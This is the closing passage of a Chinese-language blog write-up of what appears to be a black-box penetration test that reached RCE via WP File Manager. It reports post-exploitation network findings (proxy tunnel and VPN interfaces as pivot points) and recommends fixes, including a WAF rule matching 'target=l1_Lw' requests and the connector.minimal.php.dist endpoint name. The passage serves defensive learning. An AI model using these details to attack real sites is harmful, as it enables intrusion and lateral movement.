<p><img src="/images/blog1/10.png" alt="通过 iconv 进行底层编码转换重构标准输出"></p>
<p><strong>战果研判（极其重要的后渗透发现）</strong>：<br>通过完美的标准输出，我不但取得了最高级别的命令执行权限，更在网络拓扑中发现了重大情报。目标宿主机除了暴露在 <code>192.168.31.0/24</code> 网段外，其底层还秘密运行着 <code>singbox_tun (172.18.0.2)</code> 代理隧道以及 <code>Radmin VPN (26.226.78.169)</code> 虚拟局域网。<br>在真实的红蓝对抗中，这几个隐藏的虚拟网卡将成为攻击者跳出当前隔离区，向内网深处进行隐蔽穿透的绝佳跳板。</p>
<hr>
<h2 id="0x05-总结与防御建议"><a href="#0x05-总结与防御建议" class="headerlink" title="0x05 总结与防御建议"></a>0x05 总结与防御建议</h2><p>本次黑盒渗透完整验证了“隐蔽式安全”的脆弱性。防御者试图通过重命名插件目录来规避自动化扫描，但这在具有针对性字典的 Fuzzing 攻击下形同虚设。最终，凭借对组件指纹的精准识别以及对 Web 容器底层数据处理逻辑（数组强制传参）的理解，成功突破了目标防线。</p>
<p><strong>给防守方的修复建议：</strong></p>
<ol>
<li><strong>彻底移除测试代码</strong>：切勿在生产环境中遗留如 <code>connector.minimal.php.dist</code> 类的无鉴权测试接口，发布前务必进行严格的代码审计。</li>
<li><strong>及时更新组件</strong>：摒弃单纯的“重命名隐藏”策略，恢复默认的插件更新机制，并及时将 WP File Manager 升级至 6.9 及以上安全版本。</li>
<li><strong>纵深防御机制 (Defense in Depth)</strong>：<ul>
<li><strong>Web 层</strong>：配置 WAF 规则，针对非法的 Multipart 文件上传及带有 <code>target=l1_Lw</code> 特征的请求进行拦截。</li>
<li><strong>系统层</strong>：严格降权 Web 服务的运行权限（如限制在受控的 <code>www-data</code> 或特定普通用户组），并做好网段隔离，遏制 RCE 触发后的内网跨网段横向移动风险。</li>
</ul>
</li>
</ol>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag"># 渗透测试</a>
              <a href="/tags/RCE%E6%BC%8F%E6%B4%9E/" rel="tag"># RCE漏洞</a>
              <a href="/tags/%E7%9B%AE%E5%BD%95%E7%88%86%E7%A0%B4/" rel="tag"># 目录爆破</a>
              <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" rel="tag"># 漏洞复现</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
            </div>
            <div class="post-nav-item">
                <a href="/2026/05/22/HawkEye-Scanner%EF%BC%9A%E7%BA%AF%E7%A6%BB%E7%BA%BF%20JWT%20%E5%BC%B1%E5%AF%86%E9%92%A5%E9%AB%98%E5%B9%B6%E5%8F%91%E6%8E%A2%E6%B5%8B%E5%99%A8/" rel="next" title="构建高可用 JWT 审计工具：HawkEye-Scanner 底层架构与并发实践">
                  构建高可用 JWT 审计工具：HawkEye-Scanner 底层架构与并发实践 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2026</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">smile cat</span>
  </div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/mist/" rel="noopener" target="_blank">NexT.Mist</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
